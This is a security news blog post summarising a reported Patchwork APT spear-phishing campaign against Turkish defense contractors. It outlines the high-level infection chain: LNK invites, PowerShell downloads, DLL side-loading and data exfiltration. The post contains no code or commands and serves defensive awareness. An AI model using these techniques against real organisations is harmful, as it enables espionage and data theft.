India-Linked Group Targets Turkish Defense

Posted on By Finstein.ai No Comments on India-Linked Group Targets Turkish Defense

Patchwork uses fake invites with LNK files to breach missile contractors for intel
28 July 2025

The Indian-linked threat actor Patchwork (also known as APT-C-09, Dropping Elephant, Operation Hangover) has launched a spear-phishing campaign against Turkish defense contractors, aiming to collect sensitive intelligence on unmanned vehicle systems and missile programs.

Geopolitical Context

The timing aligns with deepening defense cooperation between Türkiye and Pakistan, and ongoing India-Pakistan tensions, indicating possible geopolitical motivation.

Attack Method

  • Victims received phishing emails containing Windows shortcut (.LNK) files disguised as conference invitations.
  • When opened, the LNK file runs PowerShell commands that download additional malware from expouav[.]org, a domain registered in June 2025.
  • A fake PDF mimicking a UAV conference (hosted on the legitimate waset[.]org site) is displayed to distract the user.

Infection Chain (Five Stages)

  1. A malicious DLL file is downloaded.
  2. The DLL is run using DLL side-loading, where a legitimate application is tricked into executing it.
  3. The malware then executes shellcode that performs host reconnaissance.
  4. It captures screenshots and collects system data.
  5. Collected information is sent to the attacker’s remote server.

The malware used shows a shift from earlier 64-bit DLLs to new 32-bit executable formats, with more advanced command-and-control (C2) protocols that imitate legitimate websites to avoid detection.

Broader Campaign Indicators

Patchwork has been active since at least 2009, targeting entities across South Asia and China. In 2025, they were also linked to attacks on Chinese universities and infrastructure, using a Rust-based loader and a C# trojan called Protego.

A May 2025 report from QiAnXin also suggested infrastructure overlaps between Patchwork and the Do Not Team (APT-Q-38), hinting at possible collaboration or shared tooling.

Prevent the hack before it happens. Upgrade and lock it down.
praveen@finstein.ai | https://cyber.finstein.ai/

Source: Patchwork Targets Turkish Defense Firms with Spear-Phishing Using Malicious LNK Files

#PatchworkAPT#DroppingElephant#APT09#OperationHangover#CyberEspionage#APTActivity#PhishingCampaign#MalwareCampaign#CyberThreats#DLLSideLoading

Security

Related Posts

Could a copied File-Fix link be hiding malware? Security
Iranian Cyber Offensive Shows Unprecedented Coordination Cyber
Stealthy ‘Plague’ Backdoor Hits Linux Systems Security
Akira Targets SonicWall VPNs in Zero-Day Surge Security
Akira Targets SonicWall VPNs in Zero-Day Surge Security
Scattered Spider Hijacks VMware Systems Security

Leave a Reply

Your email address will not be published. Required fields are marked *